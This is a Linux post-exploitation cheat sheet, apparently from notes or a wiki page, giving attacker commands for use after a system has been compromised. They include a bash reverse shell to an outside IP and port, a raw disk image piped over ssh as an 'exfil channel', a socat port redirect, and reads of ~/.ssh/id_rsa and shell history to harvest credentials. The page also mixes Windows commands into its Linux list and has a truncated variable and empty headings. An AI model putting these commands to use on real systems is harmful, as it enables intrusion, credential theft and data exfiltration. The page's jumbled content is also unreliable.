Linux Post Exploitation Discovery

Linux Post Exploitation Discovery

Description

Techniques

Resources

• Identify current user ID and privileges

• Identify network connections (for lateral movement)

• Identify Running processes

• Identify Chron jobs/scheduled tasks

• Identify if Active Directory environment then identify users/groups/computers if in cloud or on-prem

• If not AD, then find applications, firewalls, AV

whoami /priv netstat -na | findstr "ESTABLISHED" or "WAITING" arp -a systeminfo | findstr "Domain"

Linux Exploits

Commands

Redirect IPv6 listening TCP port to localhost IPv4.

IPV6ADDR=fc00:660:0:1::46
&& PORT=110 && socat
TCP-LISTEN:$PORT,reuseaddr,
fork TCP6:[$IPV6ADDR]:$POR

Find Juicy Stuff in the File System

 find /PATH/TO/DIRECTORY
-name "FILE-FILTER" -type
f -exec grep -i "STRING"
{} \; -print 2>/dev/null

Find public ip

curl -4 icanhazip.com

Make output easier to read

alias ccat='pygmentize
-O bg=dark,style=colorful'

Encrypted Exfil channel

dd if=/dev/rdisk0s1s2
bs=65536 conv=noerror,sync
| ssh -C user@10.10.10.10
"cat >/tmp/image.dd"

Check service every second

while (true); do nc -vv
-z -w3 10.10.10.10 80 >
/dev/null && echo -e
"Service is up"; sleep 1;
done

Website Cloner

wget -r -nH $URL

Type “gah” after you forgot to use sudo, and it’ll sudo your most recent command.

alias gah='sudo $(history
-p \!\!)'

Create a reverse shell back to a given IP address and port.

bash -i >&
/dev/tcp/10.10.10.10/8080
0>&1

Encode or decode base64 information.

echo 'Hello, World!' |
base64

echo
'SGVsbG8sIFdvcmxkIQo=' |
base64 -d

Helpful Commands

cat ~/.bash_history
cat ~/.ssh/config
cat ~/.ssh/id_rsa
cat ~/.ssh/known_hosts

Linux Post Exploitation Tools

• BusyBox

• NMAP

• Responder.py

• tcpdump

• http://www.monkey.org/~dugsong/dsniff/

• http://www.dest-unreach.org/socat/

• https://www.gnu.org/software/screen/

• http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html

• http://tgcd.sourceforge.net/

Resources